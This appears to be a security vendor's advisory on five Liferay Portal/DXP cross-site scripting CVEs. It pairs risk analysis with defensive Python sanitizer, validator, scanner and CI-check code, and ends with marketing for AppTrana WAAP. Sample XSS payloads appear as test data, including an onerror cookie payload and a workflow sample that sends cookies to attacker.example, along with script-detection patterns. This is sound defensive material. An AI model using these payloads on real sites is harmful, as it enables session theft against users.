Multiple XSS Vulnerabilities in Liferay Portal & DXP: Analysis, Impact, and Prevention
Multiple Cross-Site Scripting (XSS) vulnerabilities were disclosed across Liferay Portal and DXP in 2024–2025, affecting workflow modules, blogs, rich-text fields, custom object labels, and search widgets. Notably, a stored XSS in the Workflow Process Builder (CVE-2025-62239) highlights the potential risk of executing malicious scripts in administrators’ browsers.
Other vulnerabilities, including reflected and stored XSS in public-facing blogs and configuration fields, further emphasize the need for comprehensive mitigation. These vulnerabilities can allow attackers to steal sessions, alter workflows, or deliver phishing payloads.
Key XSS Vulnerabilities Identified in Liferay
Liferay Portal and Liferay DXP are widely used enterprise platforms for building digital experiences, powering intranets, customer portals, and content management systems. Their modular architecture, extensive customization options, and administrative flexibility make them powerful but also increase the potential exposure to web application vulnerabilities such as Cross-Site Scripting (XSS).
Between 2024 and 2025, multiple XSS vulnerabilities were reported across various Liferay components. These vulnerabilities were publicly disclosed through vendor security advisories and NVD (National Vulnerability Database) entries, highlighting risks across both stored and reflected XSS types.
The notable disclosures include:
- CVE-2025-62239 — Stored XSS in Workflow Process Builder
- CVE-2025-4576 — Reflected XSS in Blogs Entry Caption
- CVE-2025-43791 — Stored XSS in Rich Text Fields
- CVE-2025-4388 — Reflected XSS in Marketplace App Manager
- CVE-2025-43794 — Stored XSS in Instance Configuration (CDN Host Fields)
CVE-2025-62239 — XSS in Workflow Process Builder (Stored)
Risk Analysis
Severity: Medium
CVSSv4.0: Base Score: 4.6 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low
A stored (persistent) XSS vulnerability exists in the Workflow Process Builder module. Attackers with workflow editing privileges can inject malicious JavaScript into workflow definitions. The injected payload executes when administrators or other users view or edit those workflows.
Affected Versions:
- Liferay Portal 4.3.21–7.4.3.111
- Liferay DXP 2023 Q3–Q4 builds
Attack Vector:
- Requires authenticated access with workflow editing rights.
- Payload stored in workflow definition metadata (e.g., JSON/XML).
- Executes in admin browser when workflows are rendered.
Impact & Exploitation Possibilities
- Because the script runs in an administrative UI context with the administrator's session, it can read session cookies (unless they are HttpOnly), manipulate the UI, and issue requests through the admin interface; CSRF tokens do not help here, since the script can read them from the page.
- It may modify workflows or other configuration settings, possibly introducing further persistence or backdoors.
- Because it is stored, the payload remains until removed; it survives restarts or app reloads.
Liferay’s patch introduced stronger output encoding for workflow metadata and stricter input filtering to strip HTML tags from process labels.
CVE-2025-4576 — Reflected XSS in Blogs entry caption
Risk Analysis
Severity: Medium
CVSSv4.0: Base Score: 6.9 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low
A reflected XSS in the Blogs module’s entry_cover_image_caption.jsp allows attackers to inject scripts through crafted parameters in public-facing URLs.
Affected Versions:
Liferay Portal / DXP builds active during mid-2025 disclosures.
Attack Vector:
- Unauthenticated attacker crafts malicious URLs with script payloads.
- Payload reflected directly into HTML response without proper encoding.
Impact & Exploitation
- Because it is reflected (not stored), exploitation is transient: the payload executes only when a victim opens the crafted link.
- The attacker can read session cookies (if they are not HttpOnly), manipulate the page DOM, or chain further actions in the victim's authenticated session.
- This is a lower overall risk than stored XSS but still dangerous, especially when the link is delivered through phishing.
Liferay encoded the caption output in the JSP template and introduced server-side validation to reject suspicious payloads.
CVE-2025-43791 — XSS in Rich Text Fields (Multiple Stored XSS)
Risk Analysis
Severity: Medium
CVSSv4.0: Base Score: 4.8 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low
Multiple stored XSS vulnerabilities were found in rich-text-capable fields across web content, documents, and custom data types.
Affected Versions:
Liferay Portal 7.3.0–7.4.3.111
Liferay DXP 2023 Q3/Q4 series
Attack Vector:
- Injecting malicious HTML/JS into rich-text fields.
- Payload executes when content is viewed.
Impact & Exploitation
- Stored XSS means every user or anonymous visitor who views a page containing that content executes the malicious script.
- The attacker might hijack sessions, modify DOM/UI, redirect victims, or embed further payloads.
- In multi-tenant or shared content contexts, the attacker might exploit content rendered for others.
Liferay standardized sanitization across its Data Engine and web content modules, enforcing a “safe HTML” whitelist that removes scripts, event attributes, and inline JavaScript URLs.
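As an added illustration of what a "safe HTML" allowlist of the kind described above has to do (this is example code, not Liferay's sanitizer, and the tag and attribute allowlist, helper names and test inputs are this example's own choices), the following Python sanitizer re-serialises rich-text input keeping only allowlisted tags and attributes, drops event-handler attributes, rejects javascript: and data: URLs even when they are entity-encoded or padded with control characters, and removes script and style elements together with their contents:

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist: tag -> attributes that may survive on it. Anything else is dropped.
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "strong": set(), "i": set(), "em": set(),
    "ul": set(), "ol": set(), "li": set(), "h2": set(), "h3": set(), "blockquote": set(),
    "a": {"href", "title"},
    "img": {"src", "alt"},
}
VOID = {"br", "img"}
# Removed together with their contents, not just their tags.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and any other non-allowlisted scheme.
    Browsers ignore tabs, newlines and other control characters inside a scheme
    ("java\\tscript:"), so strip them before looking at it."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class SafeHtml(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: entity-encoded attribute values and text arrive
        # decoded, so "java&#x09;script:" cannot hide from safe_url().
        super().__init__(convert_charrefs=True)
        self.out, self.stack, self.skipping = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skipping += 1
            return
        if self.skipping or tag not in ALLOWED:
            return                        # unknown tag: tag removed, its text kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                continue                  # drops onerror=, onclick=, style=, ...
            if name in URL_ATTRS and not safe_url(value):
                continue                  # drops href="javascript:..."
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skipping = max(0, self.skipping - 1)
        elif not self.skipping and tag in self.stack:
            while True:                   # also closes anything left open inside
                top = self.stack.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data))  # text is re-encoded on the way out

    def handle_comment(self, data):
        pass                              # comments never survive


def sanitize(fragment: str) -> str:
    """Re-serialise `fragment` keeping only allowlisted tags, attributes and URL
    schemes; unclosed tags are closed so the output is well-formed."""
    p = SafeHtml()
    p.feed(fragment)
    p.close()
    return "".join(p.out) + "".join(f"</{t}>" for t in reversed(p.stack))
```

Two design points matter more than the allowlist itself: the input is decoded before the URL check and re-encoded on output, so an entity-encoded `javascript:` cannot slip past, and unknown tags are removed while their text is kept, so a bypass attempt degrades to harmless text rather than to an error. In production, a maintained sanitizer library is the safer choice; the example shows the decisions such a library has to make.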
CVE-2025-4388 — Reflected XSS in Marketplace App Manager Web
Risk Analysis
Severity: Medium
CVSSv4.0: Base Score: 6.9 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Exploit available in public: No
Exploit complexity: Low
A reflected XSS vulnerability in the marketplace-app-manager-web module (via icon.jsp) allows crafted parameters to inject JavaScript in the app management interface.
Affected Versions:
Liferay Portal 7.4.0–7.4.3.131,
Liferay DXP 2024 Q4.x and related builds
Attack vector & conditions
- An attacker crafts a URL to …/o/marketplace-app-manager-web/icon.jsp?param=<script>…</script> (or similar) where the script payload is reflected in the resulting page.
- Because the JSP does not sufficiently sanitize or HTML-encode the reflected input, the script executes in the context of the user’s browser.
Impact & Exploitation
- Because it is reflected, exploitation requires victim interaction: the victim has to open the crafted link.
- The attacker could read session or cookie information, manipulate the UI, or issue further requests in the victim's session.
- The module belongs to app management, which administrators and other privileged users visit, so the victims this vector reaches tend to hold elevated rights, raising the impact.
The patch released in Liferay DXP 2024.Q1.13 added strict encoding for reflected inputs and rejected invalid parameter characters (<, >, quotes).
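Both reflected cases above (the blog caption JSP and the marketplace icon.jsp) and the workflow fix come down to the same thing: output encoding that matches the context the value lands in. The following is an added example, not Liferay's code; it uses a Python stand-in for the JSP, and the template strings, the parameter name and the payload are assumptions. It renders one constructed payload through the vulnerable and the hardened pattern and then parses the result the way a browser would, so the difference shows up as elements and event handlers that do or do not exist:

```python
from html import escape
from html.parser import HTMLParser

# Constructed payload of the kind a reflected-XSS link carries: it closes the
# attribute and tag it lands in, then adds an element with an event handler.
PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'


def render_caption_unsafe(caption: str) -> str:
    """Vulnerable pattern: the request parameter is concatenated into markup,
    the Python equivalent of <%= caption %> in a JSP. (Hypothetical template.)"""
    return f'<img src="/cover.jpg" alt="{caption}"><figcaption>{caption}</figcaption>'


def render_caption_safe(caption: str) -> str:
    """Hardened pattern: HTML-encode for the context the value lands in.
    escape(..., quote=True) also encodes quotes, which an attribute value needs."""
    enc = escape(caption, quote=True)
    return f'<img src="/cover.jpg" alt="{enc}"><figcaption>{enc}</figcaption>'


class _TagAudit(HTMLParser):
    """Parses markup the way a browser would and records what actually exists."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(markup: str) -> dict:
    """Count <img> elements and on* event-handler attributes in rendered markup."""
    p = _TagAudit()
    p.feed(markup)
    p.close()
    return {"img_tags": p.tags.count("img"), "event_handlers": p.handlers}


if __name__ == "__main__":
    print("unsafe:", audit(render_caption_unsafe(PAYLOAD)))   # 3 img tags, 2 handlers
    print("safe:  ", audit(render_caption_safe(PAYLOAD)))     # 1 img tag, no handlers
```

In Liferay code the same encoding is what HtmlUtil.escape() provides on the server side. Rejecting characters such as <, > and quotes at the parameter, as the patch description mentions, is a useful second layer, but encoding is the control that must be present: it neutralises the payload regardless of which characters the attacker manages to get through, and it has to be chosen per context (HTML text, attribute value, URL, or JavaScript each need a different encoder).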
CVE-2025-43794 — Stored XSS in Instance Configuration (CDN host fields)
Risk Analysis
Severity: Medium
CVSSv4.0: Base Score: 4.6 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low
This vulnerability allows stored XSS via the Instance Configuration settings: specifically, the CDN Host HTTP and CDN Host HTTPS text fields. An authenticated user with “instance administrator” privileges can inject malicious script into those fields, which later gets included across all pages.
Affected Versions:
Liferay Portal 7.4.0–7.4.3.111 and related DXP versions.
Attack Vector:
- Authenticated instance admins insert script tags into CDN configuration fields.
- Scripts execute globally on all pages using those values.
Impact & Exploitation
- Although rated Medium because instance-administrator privileges are required, the reach is broad: the script is emitted globally, so it affects every user of the instance, administrators included.
- The payload runs everywhere the configuration value is rendered (header/footer), so a compromised or malicious administrator account can use it to keep access and extend it to other users.
- Only administrators can set the value, but that restriction limits who can plant the payload, not who executes it.
Patched versions strictly sanitize and validate input as hostnames, stripping all tags and script-like characters before storage.
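The hostname validation described above is the right shape of fix for a configuration field of this kind: the value has a narrow legitimate format, so it can be validated against that format instead of being filtered for bad characters. The following is an added example, not Liferay's validator; it assumes the field holds a bare hostname or IP literal (the page does not say whether a scheme is part of the stored value), and it chooses to reject invalid values rather than strip tags from them:

```python
import ipaddress
import re

# One DNS label per RFC 1123: 1-63 chars, letters/digits/hyphens, no hyphen at
# either end. The whole name must also fit in 253 characters.
_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(value: str) -> bool:
    """Strict allowlist check: bare hostname or IP literal, nothing else.
    Every XSS payload contains characters outside [a-z0-9.-], so it fails closed."""
    if not value or len(value) > 253 or value != value.strip():
        return False
    try:                                  # IPv4 / bracketed IPv6 literals are hosts too
        ipaddress.ip_address(value.strip("[]"))
        return True
    except ValueError:
        pass
    name = value.lower().rstrip(".")      # one trailing dot (FQDN form) is tolerated
    return all(_LABEL.match(label) for label in name.split("."))


def validate_cdn_host(value: str) -> str:
    """Validate-then-store. The value is rejected, not 'cleaned': stripping tags
    from a bad value can leave a fragment that still renders as markup elsewhere."""
    if not is_valid_hostname(value):
        raise ValueError(f"not a hostname: {value!r}")
    return value.lower()
```

Rejecting is preferable to stripping for a field like this: a stripped value such as cdn.example.com"&gt; is still wrong, it would be stored without anyone noticing, and whether it is harmless depends on how every consumer of the value encodes it. A rejected value produces an error the administrator sees immediately.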
Protecting Your Liferay Environment
Even if your version is not directly listed, you should assume similar vectors may exist.
Here is what to do:
Immediate steps
- Apply the latest patches from Liferay’s Security Advisories.
- Enable WAF or WAAP virtual patching for the affected endpoints as a stopgap until the vendor patch is applied (AppTrana WAAP can block XSS payloads immediately).
- Search for stored scripts in workflow definitions, configuration files, and database fields.
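The search for stored payloads in the last step above, and the workflow-definition case described earlier (payload stored in workflow metadata such as JSON or XML), can be done with a triage scan over exports rather than by eyeballing the database. The following is an added example, not a Liferay or AppTrana tool: it walks an XML document and a JSON document and reports every string that looks like script. The indicator patterns are heuristics chosen for this example and produce candidates for review, not verdicts; the workflow XML and configuration JSON below are constructed, simplified samples, not real exports:

```python
import html
import re
import xml.etree.ElementTree as ET

# Triage heuristics for stored script payloads. Each is checked on the raw value
# and on its HTML-decoded form, since some templates decode before rendering.
INDICATORS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("embedding-tag", re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("script-url", re.compile(r"\b(javascript|vbscript|data)\s*:", re.I)),
    ("srcdoc", re.compile(r"\bsrcdoc\s*=", re.I)),
]


def suspicious(value: str) -> list:
    """Names of the indicators that match `value` (raw or HTML-decoded)."""
    hits = []
    for form in (value, html.unescape(value)):
        for name, rx in INDICATORS:
            if name not in hits and rx.search(form):
                hits.append(name)
    return hits


def scan_xml(document: str):
    """Walk every element text and attribute of an XML document (for example an
    exported workflow definition) and yield (location, value, hits)."""
    for elem in ET.fromstring(document).iter():
        for attr, val in elem.attrib.items():
            if (hits := suspicious(val)):
                yield f"{elem.tag}@{attr}", val, hits
        if elem.text and (hits := suspicious(elem.text)):
            yield elem.tag, elem.text.strip(), hits


def scan_json(obj, path="$"):
    """Recurse through a JSON document (for example a configuration export)."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from scan_json(val, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from scan_json(val, f"{path}[{i}]")
    elif isinstance(obj, str) and (hits := suspicious(obj)):
        yield path, obj, hits


# Constructed samples: a simplified workflow definition and a configuration
# export. They are not real Liferay exports or real customer data.
SAMPLE_WORKFLOW_XML = """<?xml version="1.0"?>
<workflow-definition>
  <name>Legal Review</name>
  <description>Approve contracts</description>
  <task>
    <name>review</name>
    <description>&lt;img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)&gt;</description>
  </task>
  <state>
    <name>approved</name>
    <metadata>{"xy": "100,200", "label": "Approved"}</metadata>
  </state>
</workflow-definition>"""

SAMPLE_CONFIG_JSON = {
    "cdn.host.http": "cdn.example.com",
    "cdn.host.https": 'cdn.example.com"><script>alert(document.domain)</script>',
    "site.description": "Approved on 2024-01-01",
}


def findings() -> list:
    """Run both scanners over the samples; each entry is (location, value, hits)."""
    return list(scan_xml(SAMPLE_WORKFLOW_XML)) + list(scan_json(SAMPLE_CONFIG_JSON))


if __name__ == "__main__":
    for location, value, hits in findings():
        print(f"{location}: {hits} -> {value[:60]}")
```

Point the scanners at whatever export you can obtain for each store the advisories name (workflow definitions, instance configuration, web content and custom object labels) and review every hit by hand; the decoded check matters because a payload stored entity-encoded is only safe as long as every template that renders it encodes again.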
Hardening measures
- Set HttpOnly, Secure and SameSite on session cookies to limit session theft; note that HttpOnly stops cookie exfiltration but not actions the script performs in the victim's session.
- Apply a Content Security Policy (CSP) that disallows inline scripts (no 'unsafe-inline' in script-src, or nonces/hashes for scripts that must be inline).
- Train admins not to paste HTML/JS snippets into configuration or content fields.
- Integrate automated XSS tests into CI pipelines.
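The cookie, CSP and CI-test measures above can be turned into one check that runs against every build. The following is an added example, not part of the original page and not an AppTrana or Liferay feature: it audits Set-Cookie and Content-Security-Policy headers, and it detects reflection by sending a unique canary that contains the characters an HTML encoder must neutralise and checking whether it comes back unchanged. The URL template placeholder, the response dictionaries and the two sample responses are assumptions and constructed data, not captured from a real Liferay instance:

```python
import secrets
from urllib.parse import quote


def cookie_findings(set_cookie_headers) -> list:
    """Flag cookies set without HttpOnly, Secure, or a Lax/Strict SameSite."""
    problems = []
    for header in set_cookie_headers:
        name_value, *attr_parts = [p.strip() for p in header.split(";")]
        name = name_value.split("=", 1)[0]
        attrs = {}
        for part in attr_parts:
            key, _, val = part.partition("=")
            attrs[key.lower()] = val
        if "httponly" not in attrs:
            problems.append(f"{name}: missing HttpOnly")
        if "secure" not in attrs:
            problems.append(f"{name}: missing Secure")
        if attrs.get("samesite", "").lower() not in ("lax", "strict"):
            problems.append(f"{name}: missing or weak SameSite")
    return problems


def csp_findings(csp: str) -> list:
    """Flag a CSP whose effective script source list still permits inline or
    wildcard script. 'unsafe-inline' is ignored by browsers once a nonce or hash
    is present, so that combination is accepted."""
    if not csp:
        return ["no Content-Security-Policy header"]
    directives = {}
    for directive in csp.split(";"):
        if directive.strip():
            name, *values = directive.split()
            directives[name.lower()] = [v.lower() for v in values]
    src = directives.get("script-src", directives.get("default-src"))
    if src is None:
        return ["CSP has neither script-src nor default-src"]
    problems = []
    has_nonce_or_hash = any(v.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for v in src)
    if "'unsafe-inline'" in src and not has_nonce_or_hash:
        problems.append("script-src allows 'unsafe-inline' without nonce/hash")
    if "*" in src:
        problems.append("script-src allows '*'")
    return problems


def make_canary() -> str:
    """Unique marker carrying the characters an HTML encoder must neutralise."""
    return f"xss{secrets.token_hex(4)}'\"<>"


def reflected_unencoded(canary: str, body: str) -> bool:
    """True if the canary came back byte-for-byte, i.e. the endpoint reflects
    input without HTML encoding. An encoded reflection (&lt; &gt; &quot;) passes."""
    return canary in body


def check_response(resp: dict, canary: str) -> list:
    """Combine the three checks for one response; an empty list means clean."""
    problems = cookie_findings(resp["set-cookie"]) + csp_findings(resp["content-security-policy"])
    if reflected_unencoded(canary, resp["body"]):
        problems.append("input reflected without HTML encoding")
    return problems


def probe(url_template: str, canary: str) -> dict:
    """Live version for a CI job: fetch url_template with the canary substituted
    for {canary}. Network access is assumed; the samples below avoid it."""
    import urllib.request
    url = url_template.format(canary=quote(canary, safe=""))
    with urllib.request.urlopen(url, timeout=10) as r:
        return {"set-cookie": r.headers.get_all("Set-Cookie") or [],
                "content-security-policy": r.headers.get("Content-Security-Policy", ""),
                "body": r.read().decode(errors="replace")}


# Constructed responses (not captured from a real Liferay instance).
CANARY = "xss7f3a9c'\"<>"
WEAK_RESPONSE = {
    "set-cookie": ["JSESSIONID=abc123; Path=/"],
    "content-security-policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "body": f"<figcaption>{CANARY}</figcaption>",
}
HARDENED_RESPONSE = {
    "set-cookie": ["JSESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"],
    "content-security-policy": "default-src 'self'; script-src 'self' 'nonce-d2VsbA'",
    "body": "<figcaption>xss7f3a9c&#x27;&quot;&lt;&gt;</figcaption>",
}
```

In a pipeline, call probe() once per parameter you want covered (for example with the template "https://staging.example.test/-/blogs/?caption={canary}", an assumed URL) and fail the job when check_response() returns anything. The canary approach deliberately avoids sending real exploit strings: a WAF in front of the test environment would block those and hide the underlying encoding defect, whereas an unencoded reflection of harmless characters is the defect itself.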
AppTrana Coverage for Liferay XSS Vulnerabilities
AppTrana WAAP provides comprehensive protection against CVE-2025-62239 and similar XSS vulnerabilities. It acts as a first line of defense by blocking malicious inputs before they reach workflow interfaces and offers virtual patching, securing your Liferay environment even before vendor updates are applied.
AppTrana enforces content security policies, validates and sanitizes user inputs, continuously monitors workflow pages for vulnerabilities, and oversees administrative actions to detect suspicious behavior. By combining prevention, detection, and mitigation in a single solution, AppTrana ensures that Liferay customers are proactively protected against script injection attacks without solely relying on patch updates.